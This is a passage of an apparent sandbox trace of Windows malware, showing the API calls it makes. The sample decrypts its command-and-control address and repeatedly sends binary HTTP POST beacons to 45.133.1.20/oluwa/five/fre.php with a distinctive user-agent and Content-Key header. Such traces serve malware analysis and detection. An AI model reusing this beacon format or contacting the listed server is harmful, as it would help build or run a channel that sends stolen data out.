%X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0241.164] GetProcessHeap () returned 0x6a0000 [0241.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0241.164] GetProcessHeap () returned 0x6a0000 [0241.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0241.165] send (s=0x7ac, buf=0x6bd460*, len=242, flags=0) returned 242 [0241.165] send (s=0x7ac, buf=0x6bb998*, len=159, flags=0) returned 159 [0241.166] GetProcessHeap () returned 0x6a0000 [0241.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0241.166] recv (in: s=0x7ac, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0241.254] GetProcessHeap () returned 0x6a0000 [0241.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0241.255] GetProcessHeap () returned 0x6a0000 [0241.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0241.256] GetProcessHeap () returned 0x6a0000 [0241.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db810 | out: hHeap=0x6a0000) returned 1 [0241.256] GetProcessHeap () returned 0x6a0000 [0241.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0241.257] closesocket (s=0x7ac) returned 0 [0241.257] GetProcessHeap () returned 0x6a0000 [0241.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0241.257] GetProcessHeap () returned 0x6a0000 [0241.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0241.258] GetProcessHeap () returned 0x6a0000 [0241.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0241.258] GetProcessHeap () returned 0x6a0000 [0241.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0241.259] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14e0) returned 0x7ac [0241.261] Sleep (dwMilliseconds=0xea60) [0241.262] GetProcessHeap () returned 0x6a0000 [0241.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0241.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.264] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.272] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0241.280] GetProcessHeap () returned 0x6a0000 [0241.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6db190 [0241.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.282] CryptImportKey (in: hProv=0x6bec18, pbData=0x6db190, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0241.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.283] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.285] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.285] GetProcessHeap () returned 0x6a0000 [0241.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db190 | out: hHeap=0x6a0000) returned 1 [0241.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.287] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0241.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.288] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0241.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.294] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0241.294] GetProcessHeap () returned 0x6a0000 [0241.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0241.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.295] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0241.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.296] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0241.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.298] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0241.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.299] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0241.299] GetProcessHeap () returned 0x6a0000 [0241.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0241.299] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0241.299] GetProcessHeap () returned 0x6a0000 [0241.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0241.300] GetProcessHeap () returned 0x6a0000 [0241.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0241.300] GetProcessHeap () returned 0x6a0000 [0241.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0241.301] GetProcessHeap () returned 0x6a0000 [0241.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0241.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.302] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.309] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0241.319] GetProcessHeap () returned 0x6a0000 [0241.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0241.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.320] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0241.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.321] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.323] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.323] GetProcessHeap () returned 0x6a0000 [0241.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0241.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.325] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0241.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.326] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0241.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.327] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0241.327] GetProcessHeap () returned 0x6a0000 [0241.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0241.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.328] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0241.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.330] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0241.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.331] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0241.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.332] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0241.332] GetProcessHeap () returned 0x6a0000 [0241.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0241.332] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0241.332] GetProcessHeap () returned 0x6a0000 [0241.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0241.332] socket (af=2, type=1, protocol=6) returned 0x7b0 [0241.333] connect (s=0x7b0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0241.360] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0241.360] GetProcessHeap () returned 0x6a0000 [0241.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0241.360] GetProcessHeap () returned 0x6a0000 [0241.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0241.361] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0241.362] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0241.362] GetProcessHeap () returned 0x6a0000 [0241.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dba50 [0241.362] GetProcessHeap () returned 0x6a0000 [0241.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0241.363] GetProcessHeap () returned 0x6a0000 [0241.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0241.363] GetProcessHeap () returned 0x6a0000 [0241.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0241.365] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0241.367] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0241.367] GetProcessHeap () returned 0x6a0000 [0241.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0241.367] GetProcessHeap () returned 0x6a0000 [0241.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0241.368] send (s=0x7b0, buf=0x6bd460*, len=242, flags=0) returned 242 [0241.368] send (s=0x7b0, buf=0x6bb998*, len=159, flags=0) returned 159 [0241.369] GetProcessHeap () returned 0x6a0000 [0241.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0241.369] recv (in: s=0x7b0, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0241.433] GetProcessHeap () returned 0x6a0000 [0241.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0241.434] GetProcessHeap () returned 0x6a0000 [0241.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0241.436] GetProcessHeap () returned 0x6a0000 [0241.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dba50 | out: hHeap=0x6a0000) returned 1 [0241.436] GetProcessHeap () returned 0x6a0000 [0241.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0241.436] closesocket (s=0x7b0) returned 0 [0241.437] GetProcessHeap () returned 0x6a0000 [0241.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0241.437] GetProcessHeap () returned 0x6a0000 [0241.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0241.437] GetProcessHeap () returned 0x6a0000 [0241.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0241.438] GetProcessHeap () returned 0x6a0000 [0241.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0241.438] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14e4) returned 0x7b0 [0241.441] Sleep (dwMilliseconds=0xea60) [0241.442] GetProcessHeap () returned 0x6a0000 [0241.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0241.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.444] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0241.460] GetProcessHeap () returned 0x6a0000 [0241.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6a28 [0241.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.462] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b6a28, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0241.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.463] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.464] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.464] GetProcessHeap () returned 0x6a0000 [0241.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6a28 | out: hHeap=0x6a0000) returned 1 [0241.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.467] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0241.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.468] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0241.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.474] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0241.474] GetProcessHeap () returned 0x6a0000 [0241.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0241.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.475] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0241.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.477] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0241.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.478] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0241.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.479] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0241.479] GetProcessHeap () returned 0x6a0000 [0241.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0241.479] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0241.479] GetProcessHeap () returned 0x6a0000 [0241.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0241.480] GetProcessHeap () returned 0x6a0000 [0241.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0241.480] GetProcessHeap () returned 0x6a0000 [0241.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0241.481] GetProcessHeap () returned 0x6a0000 [0241.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0241.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.482] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.489] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0241.497] GetProcessHeap () returned 0x6a0000 [0241.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0241.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.498] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0241.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.499] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.501] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.501] GetProcessHeap () returned 0x6a0000 [0241.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0241.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.502] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0241.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.504] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0241.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.505] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0241.505] GetProcessHeap () returned 0x6a0000 [0241.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0241.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.507] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0241.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.508] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0241.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.509] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0241.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.511] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0241.511] GetProcessHeap () returned 0x6a0000 [0241.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0241.511] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0241.511] GetProcessHeap () returned 0x6a0000 [0241.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0241.511] socket (af=2, type=1, protocol=6) returned 0x7b4 [0241.511] connect (s=0x7b4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0241.538] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0241.538] GetProcessHeap () returned 0x6a0000 [0241.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0241.538] GetProcessHeap () returned 0x6a0000 [0241.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0241.539] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0241.540] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0241.540] GetProcessHeap () returned 0x6a0000 [0241.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db8d0 [0241.542] GetProcessHeap () returned 0x6a0000 [0241.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0241.543] GetProcessHeap () returned 0x6a0000 [0241.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0241.543] GetProcessHeap () returned 0x6a0000 [0241.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0241.544] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0241.545] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0241.545] GetProcessHeap () returned 0x6a0000 [0241.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0241.545] GetProcessHeap () returned 0x6a0000 [0241.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0241.546] send (s=0x7b4, buf=0x6bd460*, len=242, flags=0) returned 242 [0241.546] send (s=0x7b4, buf=0x6bb998*, len=159, flags=0) returned 159 [0241.547] GetProcessHeap () returned 